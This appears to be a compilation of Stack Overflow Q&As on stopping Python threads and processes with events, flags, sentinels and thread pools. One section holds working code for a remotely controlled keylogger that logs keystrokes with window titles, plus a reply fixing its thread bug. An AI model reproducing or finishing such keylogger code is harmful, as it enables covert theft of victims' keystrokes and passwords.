I need to start and stop a thread based on user input. The code below uses input() to read commands: if the input is start, it runs the recv method in a thread; if the input is close, it calls recv again with the second argument set to False, the False value being intended to stop the loop inside recv. But the console keeps printing output. It should stop, since the loop should have ended.
import re
import time
import threading

import serial                      # pyserial
from serial import SerialException


class Device():
    def __init__(self):
        self.__error = {}

    def open(self, port, baudrate):
        try:
            return serial.Serial(port, baudrate)
        except SerialException as e:
            error = re.findall(r"'(.*?)'", str(e))
            self.__error['port'] = error[0]
            self.__error['description'] = error[1]
            return None

    def __state(self, open):
        if open is None:
            if self.__error['description'] == 'Access is denied.':
                return True
            elif self.__error['description'] == 'Port is already open.':
                return True
            else:
                return False
        else:
            return True

    def write(self, device, command):
        if self.__state(device):
            device.write(command.encode('UTF-8') + b'\r')
        else:
            print(self.__error['port'] + ' ' + self.__error['description'])

    def recv(self, device, open=True):
        while open:
            if self.__state(device):
                buffer = device.readline()
                print(buffer)
                time.sleep(1)
            else:
                print(device[0] + ' ' + device[1])
                time.sleep(1)
device = Device()
serial = device.open('COM12', 9600)

while True:
    command = input('Enter a command: ')
    if command == 'start':
        t = threading.Thread(target=device.recv, args=(serial,))
        t.start()
    elif command == 'close':
        device.recv(serial, False)
    elif command == 'imei':
        device.write(serial, 'AT+CGSN')
If I am understanding your question, you are trying to do this:
1. When you begin the program and issue the start command, a new thread (Thread-2) begins executing in the recv() method of the device object.
2. The main thread (Thread-1) continues in the event loop and presents another input prompt. At the same time, Thread-2 is looping forever inside of recv().
3. In Thread-1, you then issue the close command with the intention that it should disrupt Thread-2, causing it to break out of the loop and stop writing output to the terminal.
If that is correct, then the problem is in step 3: When Thread-1 makes the call device.recv(serial, False), it has no impact on the execution of Thread-2. That is because, when a thread is created and the start method is called:
t = threading.Thread(target=my_func)
t.start()
the new thread will begin executing my_func, but it will do so with its own call stack, instruction pointer, and registers. Later, when Thread-1 calls device.recv(), it will result in a stack frame being pushed onto the call stack of Thread-1. That call is completely separate from the one that is already running in Thread-2.
Threads share many resources: Text, Data and BSS memory segments; open file descriptors; and signals (plus some other resources as well). Call stacks are not shared [1].
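A quick way to convince yourself of this (a toy example, not from the question's code): two threads running the same function each get their own frame, so the local n in one never affects the other.

import threading
import time

def countdown(label, n):
    # n lives in this thread's own stack frame
    while n > 0:
        print(label, n)
        n -= 1
        time.sleep(0.1)

a = threading.Thread(target=countdown, args=('Thread-A', 3))
b = threading.Thread(target=countdown, args=('Thread-B', 3))
a.start(); b.start()
a.join(); b.join()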
If you need to communicate between threads, the threading library provides several options that can help. One such option is threading.Event, which can be used to communicate the occurrence of some event between threads. You could use it like this:
term_event = threading.Event()

class Device:
    def recv(self, device):
        while not term_event.is_set():
            if self.__state(device):
                buffer = device.readline()
                print(buffer)
                time.sleep(1)
            else:
                print(device[0] + ' ' + device[1])
                time.sleep(1)
        term_event.clear()
This creates an event object that is shared by all of the threads in the process. It can be used by Thread-1 as a way to tell Thread-2 when to exit. Then, you need to change the event loop like this:
while True:
    command = input('Enter a command: ')
    if command == 'start':
        t = threading.Thread(target=device.recv, args=(serial,))
        t.start()
    elif command == 'close':
        term_event.set()
    elif command == 'imei':
        device.write(serial, 'AT+CGSN')
Instead of calling the recv method a second time, just set the shared event object, which Thread-2 interprets as a signal to exit. Before exiting, Thread-2 calls term_event.clear(), so a new thread can be started later on.
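To see the start/stop pattern in isolation, here is a minimal, self-contained sketch; the fake reader loop is an assumption for illustration and needs no serial port:

import threading
import time

term_event = threading.Event()

def reader():
    # stand-in for recv(): loop until the main thread sets the event
    while not term_event.is_set():
        print('reading...')
        time.sleep(1)
    term_event.clear()  # reset so a later 'start' works again

while True:
    command = input('Enter a command: ')
    if command == 'start':
        threading.Thread(target=reader).start()
    elif command == 'close':
        term_event.set()
    elif command == 'quit':
        term_event.set()
        break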
[1]: Since the threads are part of the same process, they actually occupy the same memory space as allocated by the kernel. As a consequence, each thread's private stack is (in theory) accessible by any other thread in that program.
I found this non-blocking code on Stack Overflow, which uses threads to provide the functionality of JavaScript's non-blocking setInterval function. But when I try to stop the process, it doesn't stop; even Ctrl + C does not stop it. I have tried some other methods to stop the process, but they are not working either.
Can someone please tell me the right way to stop the process? Thank you in advance.
Here is the code:
import threading

class ThreadJob(threading.Thread):
    def __init__(self, callback, event, interval):
        '''Runs the callback function every interval seconds.

        :param callback: callback function to invoke
        :param event: external event for controlling the update operation
        :param interval: time in seconds after which to fire the callback
        :type callback: function
        :type interval: int
        '''
        self.callback = callback
        self.event = event
        self.interval = interval
        super(ThreadJob, self).__init__()

    def run(self):
        while not self.event.wait(self.interval):
            self.callback()

event = threading.Event()

def foo():
    print("hello")

def boo():
    print("fello")

def run():
    try:
        k = ThreadJob(foo, event, 2)
        d = ThreadJob(boo, event, 6)
        k.start()
        d.start()
        while 1:
            flag = input("Press q to quit")
            if flag == 'q':
                quit()
                return
    except KeyboardInterrupt:
        print('Stopping the script...')
    except Exception as e:
        print(e)

run()
print("It is non-blocking")
All you need to do is to replace this line:
quit()
with this one:
event.set()
A Python program won't exit if there are threads still running, so the quit() function wasn't doing anything. The threads will exit their while loops once the event's internal flag is set, so a call to event.set() will cause the termination of both extra threads you created. Then the program will exit.
Note: technically you could set the threads to be "daemon" and then they will not keep the program alive. But that's not the right solution here, I think.
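For reference, here is the question's run() with that one-line change applied; nothing else needs to change:

def run():
    try:
        k = ThreadJob(foo, event, 2)
        d = ThreadJob(boo, event, 6)
        k.start()
        d.start()
        while 1:
            flag = input("Press q to quit")
            if flag == 'q':
                event.set()  # both ThreadJob loops see the event and exit
                return
    except KeyboardInterrupt:
        print('Stopping the script...')
    except Exception as e:
        print(e)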
I am trying to make a keylogger with Python sockets [educational purposes only, of course]. When I send the command to activate the keylogger from the server to the client, it starts the keylogger. But when I am finished with keylogging, how can I send a 'stop keylogging' command to the slave to stop the keylogging? I was thinking of threading but don't really know what I could do with it. This is the failing code I made:
import threading
from keyboard import read_key                             # pip install keyboard
from win32gui import GetWindowText, GetForegroundWindow   # pip install pywin32

# conn is the already-connected socket from the surrounding server code

def mainkeylogg():
    stopmess = "GO"
    while stopmess == "GO":
        tmpwnm = GetWindowText(GetForegroundWindow())  # get the window name
        Key = read_key()
        read_key()  # get key
        if len(Key) >= 2:
            open("Log.txt", "a").write(  # MAYBE CHANGE 'A' TO 'WB'
                (f"[{tmpwnm}][{Key}]\n"))  # (if user presses a special key) save the key with window name
        else:
            open("Log.txt", "a").write((f"{Key}"))
    print("STOPPED THREAD")

t = threading.Thread(target=mainkeylogg)
t.start()

stopmess = (conn.recv(1024)).decode()  # CAUSES THE WHILE LOOP TO CLOSE?? DOESN'T WORK
if stopmess == "STOP":
    print("STOPPED")
    message = "DONE"
    conn.send(message.encode())
EDIT (working, corrected code for future people seeing this):
def mainkeylogg():
    global dead
    dead = False
    while not dead:
        tmpwnm = GetWindowText(GetForegroundWindow())  # get the window name
        Key = read_key()
        read_key()  # get key
        if len(Key) >= 2:
            open("Log.txt", "a").write(  # MAYBE CHANGE 'A' TO 'WB'
                (f"[{tmpwnm}][{Key}]\n"))  # (if user presses a special key) save the key with window name
        else:
            open("Log.txt", "a").write((f"{Key}"))
    print("STOPPED THREAD")

t = threading.Thread(target=mainkeylogg)
t.start()
message = "STARTED KEYLOGGER"
conn.send(message.encode())

def stopkeylogger():
    stopmess = (conn.recv(1024)).decode()
    global dead
    if stopmess == "STOP":
        print("STOPPED")
        dead = True
        message = "STOPPED KEYLOGGER"
        conn.send(message.encode())
        # SEND LOG FILE
        # DELETE LOG FILE
    else:
        print("DIDNT STOP")
        message = "ERROR, DID NOT STOP KEYLOGGER"
        conn.send(message.encode())
The biggest problem you have is here:
t = threading.Thread(target=mainkeylogg())
Because you added the parens, that's going to call the function immediately, in the main thread. That function won't ever return, so you don't even get to create the Thread object, much less flow on to the socket stuff. Replace that with
t = threading.Thread(target=mainkeylogg)
Pass the function, NOT the result of the function.
Beyond that, note that the stopmess local to mainkeylogg() and the stopmess assigned at module level are two different variables, so the assignment from conn.recv() never affects the loop's condition. You need a flag that is shared between the loop and the socket-handling code, which is exactly what the global dead in the edited code provides.
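As an aside, a threading.Event is often cleaner than a global flag for this start/stop pattern. A minimal sketch of the idea; the worker body here is a placeholder, not the question's keylogging code:

import threading
import time

dead = threading.Event()

def worker():
    while not dead.is_set():
        # ... one unit of work per iteration goes here ...
        time.sleep(0.1)
    print("STOPPED THREAD")

t = threading.Thread(target=worker)
t.start()
# later, from the socket-handling code:
dead.set()   # the worker notices the flag and leaves its loop
t.join()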
I'm not too familiar with threading, and probably not using it correctly, but I have a script that runs a speedtest a few times and prints the average. I'm trying to use threading to call a function which displays something while the tests are running.
Everything works fine unless I try to put input() at the end of the script to keep the console window open. It causes the thread to run continuously.
I'm looking for some direction in terminating a thread correctly. Also open to any better ways to do this.
import speedtest, time, sys, datetime
from threading import Thread

s = speedtest.Speedtest()
best = s.get_best_server()

def downloadTest(tries):
    x = 0
    downloadList = []
    for x in range(tries):
        downSpeed = (s.download() / 1000000)
        downloadList.append(downSpeed)
        x += 1
    results_dict = s.results.dict()
    global download_avg, isp
    download_avg = (sum(downloadList) / len(downloadList))
    download_avg = round(download_avg, 1)
    isp = (results_dict['client']['isp'])
    print("")
    print(isp)
    print(download_avg)

def progress():
    while True:
        print('~ ', end='', flush=True)
        time.sleep(1)

def start():
    now = (datetime.datetime.today().replace(microsecond=0))
    print(now)
    d = Thread(target=downloadTest, args=(3,))
    d.start()
    d1 = Thread(target=progress)
    d1.daemon = True
    d1.start()
    d.join()

start()
input("Complete...")  # this causes progress thread to keep running
There is no reason for your thread to exit, which is why it does not terminate. A daemon thread normally terminates when your program (all other non-daemon threads) terminates, which does not happen here because the final input() keeps the main thread alive.
In general it is a good idea to make a thread stop by itself rather than forcefully killing it, so you would typically stop this kind of thread with a flag. Try changing the segment at the end to:
killflag = False
start()
killflag = True
input("Complete...")
and update the progress method to:
def progress():
    while not killflag:
        print('~ ', end='', flush=True)
        time.sleep(1)
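If you'd rather avoid a module-level flag, threading.Event expresses the same idea and lets the loop wake early. A self-contained sketch, where the sleep stands in for the download test:

import threading
import time

stop_progress = threading.Event()

def progress():
    while not stop_progress.is_set():
        print('~ ', end='', flush=True)
        stop_progress.wait(1)  # waits up to 1 second, returns early on set()

d1 = threading.Thread(target=progress, daemon=True)
d1.start()
time.sleep(3)        # stand-in for the download test
stop_progress.set()  # progress() exits its loop promptly
input("Complete...")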
I'm trying to use multiprocessing to run multiple background jobs while using the main process as a user interface that accepts commands through input(). Each process has to do certain jobs and writes its current status into a dictionary, which was created with manager.dict() and then passed to the Process.
After the creation of the processes, there is a loop with an input() for reading user commands. The commands are reduced to a minimum for simplicity here.
from multiprocessing import Manager
from multiprocessing import Process

with Manager() as manager:
    producers = []
    settings = [{'name': 'test'}]
    for setting in settings:
        status = manager.dict()
        logger.info("Start Producer {0}".format(setting['name']))
        producer = Process(target=start_producer, args=(setting, status))
        producer.start()
        producers.append([producer, status])
    logger.info("initialized {0} producers".format(len(producers)))

    while True:
        text_command = input('Enter your command:')
        if text_command == 'exit':
            logger.info("waiting for producers")
            for p in producers:
                p[0].join()
            logger.info("Exit application.")
            break
        elif text_command == 'status':
            for p in producers:
                if 'name' in p[1] and 'status' in p[1]:
                    print('{0}:{1}'.format(p[1]['name'], p[1]['status']))
        else:
            print("Unknown command.")
The function that runs in the other processes is pretty simple:

def start_producer(producer_setting: dict, status_dict: dict):
    importer = MyProducer(producer_setting)
    importer.set_status_dict(status_dict)
    importer.run()
I create a MyProducer instance, set the status dictionary through a setter on the object, and call the blocking run() method, which only returns when the producer is finished. On calling set_status_dict(status_dict), the dictionary is filled with a 'name' and a 'status' element.
When I run the code, the producer seems to get created: I see the "Start Producer test" and "initialized 1 producers" output, and after that the 'Enter your command:' prompt from input(), but it seems that the actual process doesn't run.
When I press Enter to skip the first loop iteration, I get the expected "Unknown command." output, and the producer process begins its actual work. After that, my 'status' command also works as expected.
When I enter 'status' in the first loop iteration, I get a KeyError, because 'name' and 'status' are not yet set in the dictionary. Those keys should get set in set_status_dict(), which itself is called from the Process target.
Why is that? Shouldn't producer.start() run the complete body of start_producer inside a new process and therefore never hang on the input() of the main process?
How can I start the processes first, without any user input, and only then wait for input()?
Edit: A complete MCVE program with this problem can be found here: https://pastebin.com/k8xvhLhn
Edit: A solution with sleep(1) after initializing the processes has been found. But why does that behavior happen in the first place? Shouldn't all the code in start_producer() run in a new process?
I have limited experience with the multiprocessing module, but I was able to get it to behave the way (I think) you want. First I added some print statements at the top of the while loop to see what might be going on, and found that it worked whenever the process had been run or joined first. I figured you didn't want the loop to block, so I moved the run() call further up, right after start(), but it turns out that run() also blocks. The real issue is that the child process just hadn't been scheduled yet when the first while-loop iteration came around: adding time.sleep(30) at the top of the loop gave the process enough time to get scheduled (by the OS) and run. (On my machine it actually only needs between 200 and 300 milliseconds of nap time.)
I replaced start_producer with:

def start_producer(producer_setting: dict, status_dict: dict):
    ## importer = MyProducer(producer_setting)
    ## importer.set_status_dict(status_dict)
    ## importer.run()
    #time.sleep(30)
    status_dict['name'] = 'foo'
    status_dict['status'] = 'thinking'
Your code modified:

if __name__ == '__main__':
    with Manager() as manager:
        producers = []
        settings = [{'name': 'test'}]
        for setting in settings:
            status = manager.dict()
            logger.info("Start Producer {0}".format(setting['name']))
            producer = Process(target=start_producer, args=(setting, status))
            producer.start()
            # add a call to run() but it blocks
            #producer.run()
            producers.append([producer, status])
        logger.info("initialized {0} producers".format(len(producers)))
        while True:
            time.sleep(30)
            for p, s in producers:
                #p.join()
                #p.run()
                print(f'name:{p.name}|alive:{p.is_alive()}|{s}')
                if 'name' in s and 'status' in s:
                    print('{0}:{1}'.format(s['name'], s['status']))
            text_command = input('Enter your command:')
            if text_command == 'exit':
                logger.info("waiting for producers")
                for p in producers:
                    p[0].join()
                logger.info("Exit application.")
                break
            elif text_command == 'status':
                for p in producers:
                    if 'name' in p[1] and 'status' in p[1]:
                        print('{0}:{1}'.format(p[1]['name'], p[1]['status']))
            else:
                print("Unknown command.")
Using Linux and Python 2.7.6, I have a script that uploads lots of files at one time. I am using multithreading with the Queue and threading modules.
I implemented a handler for SIGINT to stop the script if the user hits Ctrl-C. I prefer to use daemon threads so I don't have to clear the queue, which would require a lot of rewriting to give the SIGINT handler access to the Queue object, since handlers don't take parameters.
To make sure the daemon threads finish and clean up before sys.exit(), I am using threading.Event() and its clear() method to make threads wait. This code seems to work, as print threading.enumerate() showed only the main thread before the script terminated when I was debugging. Just to make sure, I was wondering if there is anything about this cleanup implementation that I might be missing, even though it seems to be working for me:
def signal_handler(signal, frame):
    global kill_received
    kill_received = True
    msg = (
        "\n\nYou pressed Ctrl+C!"
        "\nYour logs and their locations are:"
        "\n{}\n{}\n{}\n\n".format(debug, error, info))
    logger.info(msg)
    threads = threading.Event()
    threads.clear()
    while True:
        time.sleep(3)
        threads_remaining = len(threading.enumerate())
        print threads_remaining
        if threads_remaining == 1:
            sys.exit()
def do_the_uploads(file_list, file_quantity,
                   retry_list, authenticate):
    """The uploading engine"""
    value = raw_input(
        "\nPlease enter how many concurrent "
        "uploads you want at one time (example: 200)> ")
    value = int(value)
    logger.info('{} concurrent uploads will be used.'.format(value))
    confirm = raw_input(
        "\nProceed to upload files? Enter [Y/y] for yes: ").upper()
    if confirm == "Y":
        kill_received = False
        sys.stdout.write("\x1b[2J\x1b[H")
        q = CustomQueue()

        def worker():
            global kill_received
            while not kill_received:
                item = q.get()
                upload_file(item, file_quantity, retry_list, authenticate, q)
                q.task_done()

        for i in range(value):
            t = Thread(target=worker)
            t.setDaemon(True)
            t.start()

        for item in file_list:
            q.put(item)
        q.join()

        print "Finished. Cleaning up processes...",
        # Allowing the threads to clean up
        time.sleep(4)
def upload_file(file_obj, file_quantity, retry_list, authenticate, q):
    """Uploads a file. One file per its own thread; no batch style. This way,
    if one upload fails, no others are affected."""
    absolute_path_filename, filename, dir_name, token, url = file_obj
    url = url + dir_name + '/' + filename
    try:
        with open(absolute_path_filename) as f:
            r = requests.put(url, data=f, headers=header_collection, timeout=20)
    except requests.exceptions.ConnectionError as e:
        pass
    if src_md5 == r.headers['etag']:
        file_quantity.deduct()
If you want to handle Ctrl+C, it is enough to handle the KeyboardInterrupt exception in the main thread. Don't use global X in a function unless you assign X = some_value in it. Using time.sleep(4) to allow the threads to clean up is a code smell; you don't need it.
I am using threading.Event() and its clear() method to make threads wait.
This code has no effect on your threads:
# create a local Event object
threads = threading.Event()
# clear its internal flag (the one read by .is_set() and .wait())
threads.clear()
Don't call logger.info() from a signal handler in a multithreaded program; it might deadlock your program. Only a limited set of functions can safely be called from a signal handler. The safe option is to set a global flag in it and return immediately:
def signal_handler(signal, frame):
    global kill_received
    kill_received = True
    # return (no more code)
The signal might be delayed until q.join() returns. Even if the signal were delivered immediately, q.get() blocks your child threads: they hang until the main thread exits. To fix both issues, you could use a sentinel to signal the child threads that there is no more work, and drop the signal handler completely in this case:
def worker(stopped, queue, *args):
    for item in iter(queue.get, None):  # iterate until queue.get() returns None
        if not stopped.is_set():  # a simple global flag would also work here
            upload_file(item, *args)
        else:
            break  # exit prematurely
    # do child-specific cleanup here

# start threads
q = Queue.Queue()
stopped = threading.Event()  # set when threads should exit prematurely
threads = set()
for _ in range(number_of_threads):
    t = Thread(target=worker, args=(stopped, q) + other_args)
    threads.add(t)
    t.daemon = True
    t.start()

# provide work
for item in file_list:
    q.put(item)
for _ in threads:
    q.put(None)  # put sentinel to signal the end

while threads:  # until there are alive child threads
    try:
        for t in threads:
            t.join(.3)  # use a timeout to get KeyboardInterrupt sooner
            if not t.is_alive():
                threads.remove(t)  # remove dead
                break
    except (KeyboardInterrupt, SystemExit):
        print("got Ctrl+C (SIGINT) or exit() is called")
        stopped.set()  # signal threads to exit gracefully
I've renamed value to number_of_threads and used an explicit threads set.
Note that if an individual upload_file() call blocks, the program won't exit on Ctrl-C until that call returns.
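One partial mitigation is the split (connect, read) timeout that requests supports. A sketch of the question's requests.put line with it; keep in mind the read timeout caps stalls between received bytes, not total transfer time:

# (connect timeout, read timeout) in seconds: fail fast on dead hosts,
# and cap stalls between received bytes
r = requests.put(url, data=f, headers=header_collection,
                 timeout=(5, 20))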
Your case seems to be simple enough for the multiprocessing.Pool interface:

from multiprocessing.pool import ThreadPool
from functools import partial

def do_uploads(number_of_threads, file_list, **kwargs_for_upload_file):
    process_file = partial(upload_file, **kwargs_for_upload_file)
    pool = ThreadPool(number_of_threads)  # number of concurrent uploads
    try:
        for _ in pool.imap_unordered(process_file, file_list):
            pass  # you could report progress here
    finally:
        pool.close()  # no more additional work
        pool.join()   # wait until current work is done
It should exit gracefully on Ctrl-C; i.e., uploads that are in progress are allowed to finish, but new uploads are not started.
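A hypothetical call site (the keyword names are assumptions, and upload_file would need to drop its queue parameter, since the pool replaces the queue):

do_uploads(200, file_list,
           file_quantity=file_quantity,
           retry_list=retry_list,
           authenticate=authenticate)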